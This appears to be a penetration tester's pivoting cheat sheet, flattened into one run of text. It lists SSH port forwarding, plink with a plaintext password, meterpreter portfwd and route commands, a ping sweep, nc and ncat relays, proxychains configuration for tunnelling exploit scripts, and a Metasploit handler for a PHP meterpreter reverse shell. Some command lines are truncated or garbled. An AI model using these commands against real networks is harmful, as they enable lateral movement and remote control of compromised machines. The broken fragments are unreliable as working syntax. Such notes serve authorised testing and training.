# Pivotind understanding ssh -L 9001:yahoo.com:80 home -L :: ssh -L :: ssh -R 9001:intra-site.com:80 home (Executed from 'work') plink.exe -l root -pw mysecretpassword 111.111.111.111 -R 3307:127.0.0.1:3306 Port forward with metasploit We can also forward ports using metasploit. Say that the compromised machine is running services that are only accessible from within the network, from within that machine. To access that port we can do this in meterpreter: portfwd add -l -p -r portfwd add -l 3306 -p 3306 -r 192.168.222 portfwd add -l 3389 -p 3389 -r 192.168.1.222 root\@host:\~# for i in $(seq 1 254); do (ping -c 1 10.2.2.${i} | grep "bytes from" &); done; $nc –l –p 80 0backpipe ssh –L port:destination\_host:destination\_port username\@pivot\_host ## ssh -L 80:ip:80 user\@ip - local port forwarding ## nmap -PN -sT -sV –p 80 localhost ## nmap -PN -sV –p 80 --script=http-methods localhost ## nikto -host ip -useproxy [http://127.0.0.1:80/](http://127.0.0.1/) burp suite: destination host: \* proxy host: 127.0.0.1 proxy port: 80 Authenticaton type: none Dynamic port forwarding SSH dynamic port forwarding is set up on the attacker’s system by entering: ## ssh -D 127.0.0.1:9150 -f -N user\@ip The syntax of the command is ssh –D address:port –f –N username\@pivot\_host 2.8 Using Ncat for Pivoting ncat --listen --proxy-type http ip 8080 run post/windows/gather/arp\_scanner RHOSTS=7.7.7.0/24 use auxiliary/server/socks4a \==================================================================================== ssh portforwarding ssh -L 127.0.0.1:10000:192.168.63.142:10000 webmaster\@ip ssh -L 127.0.0.1:4444:192.168.63.142:4444 webmaster\@ip \==================================================================================== proxychaing portforwarding ssh -D 127.0.0.1:8888 webmaster\@ip strict\_chain quiet\_mode proxy\_dns remote\_dns\_subnet 224 tcp\_read\_time\_out 15000 tcp\_connect\_time\_out 8000 localnet 127.0.0.0/255.0.0.0 \[ProxyList] socks4 127.0.0.1 8888 proxychains4 -f \~/pivot.conf /usr/bin/python exploit.py ip 10000 ## proxychains4 -f \~/pivot.conf ncat -v ip 4444 \======================================================================================= ncat LDFLAGS="-static" ./configure && make ncat\_build (build ncat static binary) ncat -lv --broker -m2 10000 $ ncat -v 192.168.81.125 10000 -c "ncat -v 192.168.63.142 10000" ## ./exploit.py 127.0.0.1 10000 ## ncat -lv --broker -m2 4444 $ ncat -v 192.168.81.125 4444 -c "ncat -v 192.168.63.142 4444" ## nc -v 127.0.0.1 4444 \============================================================================= metasploit ## msfcli exploit/multi/handler PAYLOAD=php/meterpreter\_reverse\_tcp LHOST=ip LPORT=9999 E msf exploit(handler) > route add ip 255.255.255.0 1